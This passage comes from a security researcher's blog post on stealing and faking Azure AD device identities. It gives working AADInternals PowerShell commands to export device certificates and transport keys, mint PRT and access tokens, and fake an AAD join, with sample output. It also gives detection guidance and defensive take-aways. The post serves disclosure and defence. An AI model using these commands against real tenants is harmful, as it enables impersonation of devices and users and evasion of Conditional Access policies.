<span class="nv">$decPrivateProperties</span> <span class="p">=</span> <span class="no">[Security.Cryptography.ProtectedData]</span><span class="p">::</span><span class="n">Unprotect</span><span class="p">(</span><span class="nv">$privatePropertiesBlob</span><span class="p">,</span> <span class="nv">$DPAPI_ENTROPY_CNG_KEY_PROPERTIES</span><span class="p">,</span> <span class="s2">&#34;LocalMachine&#34;</span><span class="p">)</span>

<span class="c"># Decrypt the private key blob using DPAPI</span>
<span class="nv">$decPrivateBlob</span> <span class="p">=</span> <span class="no">[Security.Cryptography.ProtectedData]</span><span class="p">::</span><span class="n">Unprotect</span><span class="p">(</span><span class="nv">$privateKeyBlob</span><span class="p">,</span> <span class="nv">$DPAPI_ENTROPY_CNG_KEY_BLOB</span><span class="p">,</span> <span class="s2">&#34;LocalMachine&#34;</span><span class="p">)</span></code></pre></div>

<p><strong>Note!</strong> For AAD Registered devices, use &ldquo;CurrentUser&rdquo; instead of &ldquo;LocalMachine&rdquo;</p>

<p>The encrypted private key was <strong>BCRYPT_PRIVATE_KEY_BLOB</strong> that has P and Q parameters, but the <strong>System.Security.Cryptography.</strong><a href="https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.rsaparameters#summary-of-fields" target="_blank">RSAParameters</a> would also need <strong>DP</strong>, <strong>DQ</strong>, <strong>InverseQ</strong>, and <strong>D</strong> parameters.
This information would have been available in <strong>BCRYPT_RSAFULLPRIVATE_BLOB</strong>. The solution was to use <strong>NCryptImportKey</strong> to import the blob as <strong>RSAPRIVATEBLOB</strong> and export with <strong>NCryptExportKey</strong> as <strong>RSAFULLPRIVATEBLOB</strong>.</p>

<p>Lastly, I implemented the last missing part, a parser that was able to read <strong>BCRYPT_RSAFULLPRIVATE_BLOB</strong> and create a <strong>System.Security.Cryptography.RSAParameters</strong> object.</p>

<h1 id="stealing-the-device-identity">Stealing the device identity</h1>

<h2 id="device-certificate-and-keys">Device Certificate and keys</h2>

<p>To export the Device Certificate and keys, run the following command as administrator:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Export the device certificate and keys:</span>
<span class="nb">Export-AADIntLocalDeviceCertificate</span></code></pre></div>

<p>Output:</p>

<pre><code>Certificate exported to ea77c7d5-7b2f-4567-bf0c-c0a4ceb8b679.pfx
</code></pre>

<h2 id="transport-keys">Transport keys</h2>

<p>To export the Device Certificate and keys, run the following <strong>AADInternals</strong> functions as administrator:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Export the transport key:</span>
<span class="nb">Export-AADIntLocalDeviceTransportKey</span></code></pre></div>

<p>Output:</p>

<pre><code>WARNING: Running as LOCAL SYSTEM. You MUST restart PowerShell to restore AADJOIN02\User rights.
Transport key exported to ea77c7d5-7b2f-4567-bf0c-c0a4ceb8b679_tk.pem
</code></pre>

<p><strong>Note:</strong> Accessing transport keys requires local system rights, so AADInternals elevates the current session. This
can not be reversed, so you need to open a new PowerShell session to return &ldquo;normal&rdquo; rights. For AAD Registered devices, export the Device Certificate and keys first!</p>

<p>Now you can copy the certificate and transport key to another location to be used later.</p>

<h2 id="detecting">Detecting</h2>

<p>The detection of exporting the Device certificate and dkpub/dkpriv &amp; tkpub/tkpriv keys can only happen at the endpoint.
The next day after publishing this blog post, Roberto Rodriguez (<a href="https://twitter.com/Cyb3rWard0g" target=2_blank">@Cyb3rWard0g</a>) published detection query for Sentinel <a href="https://github.com/Azure/Azure-Sentinel/pull/4199/commits" target="_blank">here</a>.</p>

<p>For short, you should set an access control entry (ACE) on system access control list (SACL) for the following registry keys:</p>

<table>
<thead>
<tr>
<th>Key</th>
<th>Note</th>
</tr>
</thead>

<tbody>
<tr>
<td>HKLM:\SYSTEM\CurrentControlSet\Control\CloudDomainJoin</td>
<td>AAD Joined devices</td>
</tr>

<tr>
<td>HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WorkplaceJoin</td>
<td>AAD Registered devices</td>
</tr>

<tr>
<td>HKLM:\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\KeyTransportKey</td>
<td>Transport Key</td>
</tr>
</tbody>
</table>

<p>If the user accessing these registry keys is NOT <strong>lsass</strong>, an alarm should be raised.</p>

<h1 id="using-the-stolen-device-identity">Using the stolen device identity</h1>

<p>To use the stolen identity, run the following <strong>AADInternals</strong> functions:</p>

<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Save credentials to a variable (must be from the same tenant as the device)</span>
<span class="c"># If MFA is required, omit the credentials for interactive log in.</span>
<span class="nv">$cred</span> <span class="p">=</span> <span class="nb">Get-Credential</span>

<span class="c"># Get PRT settings:</span>
<span class="nv">$prtKeys</span> <span class="p">=</span> <span class="nb">Get-AADIntUserPRTKeys</span> <span class="n">-Credentials</span> <span class="nv">$cred</span> <span class="n">-PfxFileName</span> <span class="p">.\</span><span class="n">ea77c7d5</span><span class="p">-</span><span class="n">7b2f</span><span class="p">-</span><span class="n">4567-bf0c-c0a4ceb8b679</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-TransportKeyFileName</span> <span class="p">.\</span><span class="n">ea77c7d5</span><span class="p">-</span><span class="n">7b2f</span><span class="p">-</span><span class="n">4567-bf0c-c0a4ceb8b679_tk</span><span class="p">.</span><span class="n">pem</span>

<span class="c"># Create a PRT token:</span>
<span class="nv">$prtToken</span> <span class="p">=</span> <span class="nb">New-AADIntUserPRTToken</span> <span class="n">-Settings</span> <span class="nv">$prtKeys</span> <span class="n">-GetNonce</span>

<span class="c"># Get access token:</span>
<span class="nv">$at</span> <span class="p">=</span> <span class="nb">Get-AADIntAccessTokenForAADGraph</span> <span class="n">-PRTToken</span> <span class="nv">$prtToken</span></code></pre></div>

<p>Output:</p>

<pre><code>Keys saved to ea77c7d5-7b2f-4567-bf0c-c0a4ceb8b679.json

</code></pre>

<p>Now, let&rsquo;s see how the access token looks like:</p>

<p><div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Dump the access token</span>
<span class="nb">Read-AADIntAccesstoken</span> <span class="n">-AccessToken</span> <span class="nv">$at</span></code></pre></div>
Output:
<div class="highlight"><pre class="chroma"><code class="language-text" data-lang="text"><span class="ln"> 1</span>aud                 : https://graph.windows.net
<span class="ln"> 2</span>iss                 : https://sts.windows.net/2cd0c645-212d-46cc-be2b-e3ab9b4434ac/
<span class="ln"> 3</span>iat                 : 1644169150
<span class="ln"> 4</span>nbf                 : 1644169150
<span class="ln"> 5</span>exp                 : 1644173781
<span class="ln"> 6</span>acr                 : 1
<span class="hl"><span class="ln"> 7</span>amr                 : {pwd, rsa, mfa}
</span><span class="ln"> 8</span>appid               : 1b730954-1685-4b74-9bfd-dac224a7b894
<span class="ln"> 9</span>appidacr            : 0
<span class="hl"><span class="ln">10</span>deviceid            : ea77c7d5-7b2f-4567-bf0c-c0a4ceb8b679
</span><span class="ln">11</span>family_name         : John
<span class="ln">12</span>given_name          : Doe
<span class="ln">13</span>ipaddr              : 214.63.172.228
<span class="ln">14</span>name                : John Doe
<span class="ln">15</span>oid                 : 47bd560e-fd5e-42c5-b51b-ce963892805f
<span class="ln">16</span>onprem_sid          : S-1-5-21-1357286652-147530443-861848650-6407
<span class="ln">17</span>scp                 : user_impersonation
<span class="ln">18</span>tenant_region_scope : EU
<span class="ln">19</span>tid                 : 2cd0c645-212d-46cc-be2b-e3ab9b4434ac1
<span class="ln">20</span>unique_name         : JohnD@company.com
<span class="ln">21</span>upn                 : JohnD@company.com
<span class="ln">22</span>ver                 : 1.0</code></pre></div></p>

<p>As we can see, the access tokens obtained using the PRT token will have the <strong>deviceId</strong> claim (line 10).
Depending on how did you get the PRT keys, you&rsquo;ll also have <strong>rsa</strong> and possibly <strong>mfa</strong> claims (line 7).</p>

<h1 id="faking-device-identity">Faking device identity</h1>

<p>What about doing this the other way around - would it be possible to fake the identity of Windows computer? For short, yes it is!</p>

<p>We have two options:</p>

<ol>
<li>Create a <a href="/post/prt/#creating-your-own-prt" target="_blank">fake device</a> identity with AADInternals</li>
<li>Use the stolen identity</li>
</ol>

<p>Only difference is that the former uses just one .pfx file, whereas the stolen identity has also the transport key in .pem file.</p>

<p>When &ldquo;joining&rdquo; the local device, AADInternals emulates the real join process and will do the following:</p>

<ul>
<li>Create a P2P certificate</li>
<li>Import the device and P2P certificates</li>
<li>Import P2P CA to AAD Token Issuer</li>
<li>Store transportkey</li>
<li>Set registry information</li>
<li>Start scheduled tasks</li>
</ul>

<p>To create a fake device with AADInternals:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get an access token for AAD join and save to cache</span>
<span class="nb">Get-AADIntAccessTokenForAADJoin</span> <span class="n">-SaveToCache</span>

<span class="c"># Join the fake device to Azure AD</span>
<span class="nb">Join-AADIntDeviceToAzureAD</span> <span class="n">-DeviceName</span> <span class="s2">&#34;My computer&#34;</span> <span class="n">-DeviceType</span> <span class="s2">&#34;Commodore&#34;</span> <span class="n">-OSVersion</span> <span class="s2">&#34;C64&#34;</span></code></pre></div></p>

<p>Output should be similar to below.</p>

<pre><code>Device successfully registered to Azure AD:
  DisplayName:     &quot;My computer&quot;
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  ObjectId:        afdeac87-b32a-41a0-95ad-0a555a91f0a4
  TenantId:        8aeb6b82-6cc7-4e33-becd-97566b330f5b
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
  Cert file name : &quot;d03994c9-24f8-41ba-a156-1805998d6dc7.pfx&quot;
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013
</code></pre>

<p>Now we are ready fake the identity of our non-AAD joined Windows computer! The device may have a TPM, that doesn&rsquo;t matter.</p>

<p>To &ldquo;join&rdquo; the computer with a fake identity created above:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Join the device using the fake identity</span>
<span class="nb">Join-AADIntLocalDeviceToAzureAD</span> <span class="n">-UserPrincipalName</span> <span class="s2">&#34;JohnD@company.com&#34;</span> <span class="n">-PfxFileName</span> <span class="p">.\</span><span class="n">d03994c9</span><span class="p">-</span><span class="n">24f8</span><span class="p">-</span><span class="n">41ba-a156</span><span class="p">-</span><span class="n">1805998d6dc7</span><span class="p">.</span><span class="n">pfx</span></code></pre></div>
Output:</p>

<pre><code>Device P2P certificate successfully created:
  Subject:         &quot;CN=d03994c9-24f8-41ba-a156-1805998d6dc7, DC=8aeb6b82-6cc7-4e33-becd-97566b330f5b&quot;
  DnsNames:        &quot;d03994c9-24f8-41ba-a156-1805998d6dc7&quot;
  Issuer:          &quot;CN=MS-Organization-P2P-Access [2021]&quot;
  Cert thumbprint: A5F4752D34F90A8E7B14C985C4AA77AB583CD1F1
  Cert file name : &quot;d03994c9-24f8-41ba-a156-1805998d6dc7-P2P.pfx&quot;
  CA file name :   &quot;d03994c9-24f8-41ba-a156-1805998d6dc7-P2P-CA.der&quot;
  
Device configured. To confirm success, restart and run: dsregcmd /status
</code></pre>

<p>To &ldquo;join&rdquo; the computer with the stolen identity from above:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Join the device using the stolen identity</span>
<span class="nb">Join-AADIntLocalDeviceToAzureAD</span> <span class="n">-UserPrincipalName</span> <span class="s2">&#34;JohnD@company.com&#34;</span> <span class="n">-PfxFileName</span> <span class="p">.\</span><span class="n">ea77c7d5</span><span class="p">-</span><span class="n">7b2f</span><span class="p">-</span><span class="n">4567-bf0c-c0a4ceb8b679</span><span class="p">.</span><span class="n">pfx</span> <span class="n">-TransportKeyFileName</span> <span class="p">.\</span><span class="n">ea77c7d5</span><span class="p">-</span><span class="n">7b2f</span><span class="p">-</span><span class="n">4567-bf0c-c0a4ceb8b679_tk</span><span class="p">.</span><span class="n">pem</span></code></pre></div></p>

<p>After updating the join information, restart the computer and log in with the username used above.</p>

<h1 id="summary">Summary</h1>

<p>In this blog post, I showed three things:</p>

<ul>
<li>How to export the device certificate and transport key of Azure Joined or Registered devices from Windows computers not having TPM</li>
<li>How to use the stolen device identity</li>
<li>How to fake AAD Join by configuring non-AAD joined Windows computer to use the provided certificate (and transport key)</li>
</ul>

<p>Stealing (and faking) device identities allows threat actors to access the target tenant using the identity of the stolen or faked device.
This may allow evading device based Conditional Access (CA) policies, as the compliance of the device is assessed against the original device.</p>

<p>Take-aways:</p>

<ul>
<li>Use only devices equipped with a TPM</li>
<li>Remove local admin rights from standard users on AAD Joined devices</li>
<li>Do not allow users to join their own devices</li>
</ul>

<h1 id="references">References</h1>

<ul>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/windows/win32/seccng/key-storage-and-retrieval" target="_blank">Key Storage and Retrieval</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon" target="_blank">Process Monitor</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/azure/active-directory/devices/troubleshoot-device-dsregcmd" target="_blank">Troubleshoot devices by using the dsregcmd command</a></li>
<li>Benjamin Delby: Mimikatz source code. <a href="https://github.com/gentilkiwi/mimikatz/blob/e10bde5b16b747dc09ca5146f93f2beaf74dd17a/modules/kull_m_key.h" target="_blank">kull_m_key.h</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/windows/win32/api/bcrypt/ns-bcrypt-bcrypt_rsakey_blob" target="_blank">BCRYPT_RSAKEY_BLOB structure (bcrypt.h)</a></li>
</ul>
		</div>
		
<div class="post__tags tags clearfix">
	<img class="icon icon-tag" src="/images/tags.png" width="16" height="16" viewBox="0 0 16 16">
	
	<ul class="tags__list">
		<li class="tags__item"><a class="tags__link" href="/tags/azure-active-directory/" rel="tag">Azure Active Directory</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/azure/" rel="tag">Azure</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/security/" rel="tag">security</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/prt/" rel="tag">PRT</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/device/" rel="tag">device</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/join/" rel="tag">join</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/hybrid-join/" rel="tag">hybrid join</a></li>
	</ul>
</div>

		<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fdeviceidentity%2f&text=Stealing%20and%20faking%20Azure%20AD%20device%20identities&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fdeviceidentity%2f&mini=true&title=Stealing%20and%20faking%20Azure%20AD%20device%20identities&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
	</article>
	
<div class="authorbox clearfix">
	<figure class="authorbox__avatar">
		<img alt="Dr Nestori Syynimaa (@DrAzureAD) avatar" src="/images/nestori.jpg" class="avatar" height="90" width="90">
	</figure>
	<div class="authorbox__header">
		<span class="authorbox__name">About Dr Nestori Syynimaa (@DrAzureAD)</span>
	</div>
	<div class="authorbox__description">
		Dr Syynimaa works as Senior Principal Information Security Researcher at Secureworks CTU (Counter Threat Unit). <br> Before moving to his current position, Dr Syynimaa worked as a CIO, consultant, trainer, and university lecturer for over 20 years. He is a regular speaker in scientific and professional conferences related to Microsoft 365 and Azure AD security. <br><br>Dr Syynimaa is Microsoft Certified Expert (Microsoft 365), Microsoft Certified Azure Solutions Architect Expert, Microsoft Certified Trainer, Microsoft MVP (Enterprise Mobility, Identity and Access &amp; Intune), and Microsoft Most Valuable Security Researcher (MVR).
	</div>
</div>
	
<nav class="post-nav row clearfix" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<div class="post-nav__item post-nav__item--prev col-1-2">
		<a class="post-nav__link" href="/post/partners/" rel="prev"><span class="post-nav__caption">«Previous</span><p class="post-nav__post-title">Microsoft partners: The Good, The Bad, or The Ugly?</p></a>
	</div>
	<div class="post-nav__item post-nav__item--next col-1-2">
		<a class="post-nav__link" href="/post/august_2022/" rel="next"><span class="post-nav__caption">Next»</span><p class="post-nav__post-title">AADInternals World Tour August 2022: USA</p></a>
	</div>
</nav>

	
<div class="comments">
	<div id="disqus_thread"></div>
<script>
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "o365blog-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

</main>

<aside class="sidebar" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
	
<div class="widget-search widget">
	<form class="widget-search__form" role="search" method="get" action="//google.com/search">
		<label>
			<span class="screen-reader-text">Search for:</span>
			<input class="widget-search__field" type="search" placeholder="SEARCH..." value="" name="q">
		</label>
		<input class="widget-search__submit" type="submit" value="Search">
		<input type="hidden" name="sitesearch" value="http://o365blog.com" />
	</form>
</div>
	
<div class="widget-recent widget">
	<h4 class="widget__title">Recent Posts</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/post/pta/">Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/gmsa/">Hunt for the gMSA secrets</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/august_2022/">AADInternals World Tour August 2022: USA</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/deviceidentity/">Stealing and faking Azure AD device identities</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/partners/">Microsoft partners: The Good, The Bad, or The Ugly?</a></li>
		</ul>
	</div>
</div>

	
<div class="widget-categories widget">
	<h4 class="widget__title">Categories</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/categories/"></a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/article">Article</a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/blog">Blog</a></li>
		</ul>
	</div>
</div>
	
<div class="widget-social widget">
	<h4 class="widget-social__title widget__title">Social</h4>
	<div class="widget-social__content widget__content">
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Twitter" rel="noopener noreferrer" href="https://twitter.com/DrAzureAD" target="_blank">
				<svg class="widget-social__link-icon icon-twitter" viewBox="0 0 384 312" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m384 36.9c-14.1 6.3-29.3 10.5-45.2 12.4 16.3-9.7 28.8-25.2 34.6-43.6-15.2 9-32.1 15.6-50 19.1-14.4-15.2-34.9-24.8-57.5-24.8-43.5 0-78.8 35.3-78.8 78.8 0 6.2.7 12.2 2 17.9-65.5-3.3-123.5-34.6-162.4-82.3-6.7 11.6-10.6 25.2-10.6 39.6 0 27.3 13.9 51.4 35 65.6-12.9-.4-25.1-4-35.7-9.9v1c0 38.2 27.2 70 63.2 77.2-6.6 1.8-13.6 2.8-20.8 2.8-5.1 0-10-.5-14.8-1.4 10 31.3 39.1 54.1 73.6 54.7-27 21.1-60.9 33.7-97.8 33.7-6.4 0-12.6-.4-18.8-1.1 34.9 22.4 76.3 35.4 120.8 35.4 144.9 0 224.1-120 224.1-224.1 0-3.4-.1-6.8-.2-10.2 15.4-11.1 28.7-25 39.3-40.8z"/></svg>
				<span>Twitter</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="" rel="noopener noreferrer" href="https://linkedin.com/in/nestori" target="_blank">
				<svg class="widget-social__link-icon icon-linkedin" viewBox="0 0 352 352" width="24" height="24" fill="#fff" xmlns="http://www.w3.org/2000/svg"><path d="M0,40v272c0,21.9,18.1,40,40,40h272c21.9,0,40-18.1,40-40V40c0-21.9-18.1-40-40-40H40C18.1,0,0,18.1,0,40z M312,32 c4.6,0,8,3.4,8,8v272c0,4.6-3.4,8-8,8H40c-4.6,0-8-3.4-8-8V40c0-4.6,3.4-8,8-8H312z M59.5,87c0,15.2,12.3,27.5,27.5,27.5 c15.2,0,27.5-12.3,27.5-27.5c0-15.2-12.3-27.5-27.5-27.5C71.8,59.5,59.5,71.8,59.5,87z M187,157h-1v-21h-45v152h47v-75 c0-19.8,3.9-39,28.5-39c24.2,0,24.5,22.4,24.5,40v74h47v-83.5c0-40.9-8.7-72-56.5-72C208.5,132.5,193.3,145.1,187,157z M64,288h47.5 V136H64V288z"/></svg>
				<span>LinkedIn</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Email" href="mailto:nestori.syynimaa@gerenios.com">
				<svg class="widget-social__link-icon icon-mail" viewBox="0 0 416 288" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m0 16v256 16h16 384 16v-16-256-16h-16-384-16zm347 16-139 92.5-139-92.5zm-148 125.5 9 5.5 9-5.5 167-111.5v210h-352v-210z"/></svg>
				<span>nestori.syynimaa@gerenios.com</span>
			</a>
		</div>
	</div>
</div>

	
<div class="widget-taglist widget">
	<h4 class="widget__title">Tags</h4>
	<div class="widget__content">
		<a class="widget__link widget__link--taglist" href="/tags/aadconnect" title="aadconnect">aadconnect (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/aadinternals" title="aadinternals">aadinternals (10)</a>
		<a class="widget__link widget__link--taglist" href="/tags/abusing" title="abusing">abusing (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/active-directory" title="active-directory">active-directory (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/adfs" title="adfs">adfs (5)</a>
		<a class="widget__link widget__link--taglist" href="/tags/admin" title="admin">admin (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/administration" title="administration">administration (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/authentication" title="authentication">authentication (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure" title="azure">azure (20)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure-active-directory" title="azure-active-directory">azure-active-directory (27)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azuread" title="azuread">azuread (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/backdoor" title="backdoor">backdoor (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blackhat" title="blackhat">blackhat (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blue-team" title="blue-team">blue-team (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/bprt" title="bprt">bprt (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/browser" title="browser">browser (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/compromise" title="compromise">compromise (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/conferences" title="conferences">conferences (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/defcon" title="defcon">defcon (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/desktop-sso" title="desktop-sso">desktop-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/device" title="device">device (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/dns" title="dns">dns (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/email" title="email">email (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/encryption" title="encryption">encryption (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/exchange" title="exchange">exchange (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/federation" title="federation">federation (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/forensics" title="forensics">forensics (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/gdpr" title="gdpr">gdpr (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/global-administrator" title="global-administrator">global-administrator (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/graph" title="graph">graph (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/groups" title="groups">groups (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/guest" title="guest">guest (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/hybrid-join" title="hybrid-join">hybrid-join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/identity" title="identity">identity (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/inactive" title="inactive">inactive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/insider" title="insider">insider (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/intune" title="intune">intune (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/join" title="join">join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/logs" title="logs">logs (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mailbox" title="mailbox">mailbox (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mdm" title="mdm">mdm (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mfa" title="mfa">mfa (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office-365" title="office-365">office-365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office365" title="office365">office365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/on-prem" title="on-prem">on-prem (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/onedrive" title="onedrive">onedrive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/outsider" title="outsider">outsider (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/partner" title="partner">partner (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/password" title="password">password (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/persistence" title="persistence">persistence (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/phishing" title="phishing">phishing (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/planner" title="planner">planner (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/powershell" title="powershell">powershell (13)</a>
		<a class="widget__link widget__link--taglist" href="/tags/prt" title="prt">prt (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/pta" title="pta">pta (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/recon" title="recon">recon (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/reconnaissance" title="reconnaissance">reconnaissance (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/seamless-sso" title="seamless-sso">seamless-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/security" title="security">security (31)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sso" title="sso">sso (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sync" title="sync">sync (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/synchronisation" title="synchronisation">synchronisation (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/t2" title="t2">t2 (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/talks" title="talks">talks (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/teams" title="teams">teams (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/user" title="user">user (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/virtual-machine" title="virtual-machine">virtual-machine (1)</a>
	</div>
</div>
</aside>

	</div>
		<footer class="footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
			<div class="container container-inner">
				<p class="footer__copyright"><span><a href="https://creativecommons.org/licenses/by/4.0/" target="_blank"><img src="/images/CC-BY.png"></a> </span></p>
			</div>
		</footer>
	</div>

<script>
	var navigation = responsiveNav(".menu", {
		navClass: "menu--collapse",
	});
</script>
</body>
</html>
